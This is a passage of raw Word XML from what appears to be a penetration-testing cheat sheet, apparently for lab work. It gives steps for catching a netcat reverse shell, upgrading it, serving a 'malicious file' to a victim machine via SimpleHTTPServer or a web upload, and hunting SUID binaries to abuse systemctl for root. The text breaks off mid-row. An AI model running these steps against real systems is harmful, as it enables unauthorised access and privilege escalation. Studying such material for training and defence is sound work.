              <w:t>Note, the full URL will depend on where you think the file has been uploaded to on the web server, and don’t forget the name of the file may be different and thus change the file name accordingly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00004E59" w14:paraId="5530248B" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77092DE2" w14:textId="49DF837B" w:rsidR="00004E59" w:rsidRDefault="00681C46" w:rsidP="00AA366F">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00004E59">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36322E04" w14:textId="32553AB3" w:rsidR="00004E59" w:rsidRDefault="00004E59" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00004E59">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(a reverse shell should now have opened up)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E1C0D1F" w14:textId="090E3486" w:rsidR="00004E59" w:rsidRDefault="00004E59" w:rsidP="00AA366F">
            <w:r>
              <w:t xml:space="preserve">Once the netcat </w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:t>reverse shell connects, you can use:</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:br/>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="006D6DD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:br/>
              <w:t>This will inform you as to your account name. Then, the shell can be upgraded with:</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:br/>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="006D6DD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>SHELL=</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="006D6DD1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin/bash </w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="006D6DD1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="006D6DD1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-q</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="006D6DD1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/dev/null</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="00450781">
              <w:t>From this position in the system, see if other user accounts can be accessed</w:t>
            </w:r>
            <w:r w:rsidR="00450781">
              <w:t xml:space="preserve"> (su command)</w:t>
            </w:r>
            <w:r w:rsidR="006D6DD1" w:rsidRPr="00450781">
              <w:t>, check sudo -l privileges</w:t>
            </w:r>
            <w:r w:rsidR="00450781" w:rsidRPr="00450781">
              <w:t>, check what groups the user belongs to</w:t>
            </w:r>
            <w:r w:rsidR="00450781">
              <w:t xml:space="preserve"> (id command)</w:t>
            </w:r>
            <w:r w:rsidR="00450781" w:rsidRPr="00450781">
              <w:t>, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00814CF0" w14:paraId="63FBB7CD" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="55B5B6D7" w14:textId="77777777" w:rsidR="00814CF0" w:rsidRDefault="00814CF0" w:rsidP="00AA366F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3734315E" w14:textId="77777777" w:rsidR="00814CF0" w:rsidRDefault="00814CF0" w:rsidP="00AA366F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6856C620" w14:textId="77777777" w:rsidR="00814CF0" w:rsidRPr="001E0F42" w:rsidRDefault="00814CF0" w:rsidP="00AA366F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65A96B46" w14:textId="351B9E70" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00814CF0"/>
    <w:p w14:paraId="7F9A0AC5" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRDefault="00EB0837">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A5297" w14:textId="1AC5C73C" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00EB0837">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidR="00B571A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SimpleHTTPServer | wget</w:t>
      </w:r>
      <w:r w:rsidR="0093285A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r w:rsidR="0093285A" w:rsidRPr="0093285A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/bin/systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D190D2F" w14:textId="77777777" w:rsidR="00C714B0" w:rsidRDefault="00C714B0" w:rsidP="00814CF0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="8024"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EB0837" w14:paraId="3CC9DFF2" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0928EB1A" w14:textId="1C6C2ADA" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00F26DBD">
            <w:r>
              <w:t>90.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01D00A6F" w14:textId="778CA9CD" w:rsidR="00EB0837" w:rsidRPr="00AA366F" w:rsidRDefault="0093285A" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2232CF80" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRDefault="00B571A0" w:rsidP="00F26DBD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B571A0">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">IF YOU CAN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve">GAIN A FOOTHOLD, YOU MAY BE ABLE TO UPLOAD </w:t>
            </w:r>
            <w:r w:rsidR="0093285A">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>FILES THAT CAN HELP YOU ESCALATE PRIVILEGES TO ROOT.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008A3E55" w14:textId="77777777" w:rsidR="0093285A" w:rsidRDefault="0093285A" w:rsidP="00F26DBD">
            <w:r w:rsidRPr="0093285A">
              <w:t xml:space="preserve">First off, </w:t>
            </w:r>
            <w:r>
              <w:t>you will need to set up a new listener on your machine using netcat:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BA7290" w14:textId="42FBD9B3" w:rsidR="0093285A" w:rsidRPr="0093285A" w:rsidRDefault="0093285A" w:rsidP="00F26DBD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0093285A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0093285A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lnvp </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD36D9">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0093285A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(The exact port number doesn’t matter too much)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="68CCF5E9" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="27A11464" w14:textId="5D17F697" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00F26DBD">
            <w:r>
              <w:t>90.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="56A0AE52" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRDefault="0093285A" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>SimpleHTTPServer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6998131F" w14:textId="37566E7F" w:rsidR="0093285A" w:rsidRPr="0093285A" w:rsidRDefault="0093285A" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="0093285A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>This python script is installed on Kali by default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</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5FDC0781" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRDefault="0093285A" w:rsidP="00F26DBD">
            <w:r w:rsidRPr="0093285A">
              <w:t xml:space="preserve">Next, </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">we shall host a simple http server that the victim machine will look for and upload our malicious file from. First, ensure you are working in the directory that the file you wish to upload will be saved </w:t>
            </w:r>
            <w:r w:rsidR="006B052C">
              <w:t>into:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B11B1F3" w14:textId="77777777" w:rsidR="006B052C" w:rsidRDefault="006B052C" w:rsidP="006B052C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> python </w:t>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-m </w:t>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">SimpleHTTPServer </w:t>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A228174" w14:textId="7C2D04EF" w:rsidR="006B052C" w:rsidRDefault="006B052C" w:rsidP="006B052C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:t>Module name</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Searches </w:t>
            </w:r>
            <w:r w:rsidRPr="006B052C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>sys.path</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and runs corresponding .py file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="3BA8F7ED" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1A02E362" w14:textId="0AAFF068" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00F26DBD">
            <w:r>
              <w:t>90.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B803308" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRDefault="006B052C" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Web Page File Upload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD9E41D" w14:textId="7246035D" w:rsidR="00C2272F" w:rsidRPr="00C2272F" w:rsidRDefault="00C2272F" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Use your initial foothold netcat listener to find the uploaded file)</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6EF47E32" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRPr="00C2272F" w:rsidRDefault="006B052C" w:rsidP="00F26DBD">
            <w:r w:rsidRPr="00C2272F">
              <w:t>Alternatively, we can use the web page file upload utility if we know the location of where the file will be saved to on the victim machine. It might be a good bet to look:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69591AAD" w14:textId="490734D1" w:rsidR="00C2272F" w:rsidRPr="00C2272F" w:rsidRDefault="006B052C" w:rsidP="00F26DBD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2272F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/var/www</w:t>
            </w:r>
            <w:r w:rsidR="00C2272F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="112953C3" w14:textId="77777777" w:rsidR="00C2272F" w:rsidRPr="00C2272F" w:rsidRDefault="00C2272F" w:rsidP="00F26DBD">
            <w:r w:rsidRPr="00C2272F">
              <w:t>If you can find your uploaded file, you might need to change its permissions:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7111319B" w14:textId="1C4FB10A" w:rsidR="00C2272F" w:rsidRPr="00C2272F" w:rsidRDefault="00C2272F" w:rsidP="00F26DBD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2272F">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>chmod</w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">wx </w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="00C2272F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:t>(This will give you read, write and execute permission)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB0837" w14:paraId="71D67919" w14:textId="77777777" w:rsidTr="00F26DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C3C193C" w14:textId="2EC194E1" w:rsidR="00EB0837" w:rsidRDefault="00EB0837" w:rsidP="00F26DBD">
            <w:r>
              <w:t>90.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="08A10059" w14:textId="3C38B3F1" w:rsidR="00EB0837" w:rsidRPr="00466824" w:rsidRDefault="005E2A71" w:rsidP="00F26DBD">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>systemctl</w:t>
            </w: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7D49D040" w14:textId="77777777" w:rsidR="00EB0837" w:rsidRDefault="00C2272F" w:rsidP="00F26DBD">
            <w:r>
              <w:t xml:space="preserve">There are instances where systemctl </w:t>
            </w:r>
            <w:r w:rsidR="005E2A71">
              <w:t xml:space="preserve">may be misconfigured to allow opportunities for it to be exploited for privilege escalation. If you run a search for files that can be run with the permissions of the file owner and see </w:t>
            </w:r>
            <w:r w:rsidR="005E2A71" w:rsidRPr="005E2A71">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>/bin/systemctl</w:t>
            </w:r>
            <w:r w:rsidR="005E2A71">
              <w:t>, you’re probably in luck:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115E0AD3" w14:textId="77777777" w:rsidR="005E2A71" w:rsidRDefault="005E2A71" w:rsidP="005E2A71">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> find </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-perm -u=</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-type</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D99DCFF" w14:textId="77777777" w:rsidR="005E2A71" w:rsidRDefault="005E2A71" w:rsidP="005E2A71">
            <w:r w:rsidRPr="005E2A71">
              <w:t>This binary file, if given the SUID (set owner UserID upon execution) can run another type of file, with a .service extension, and thus get us a root netcat listener shell.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2396F8E0" w14:textId="403B942C" w:rsidR="005E2A71" w:rsidRPr="00ED47EB" w:rsidRDefault="005E2A71" w:rsidP="005E2A71">
            <w:r>
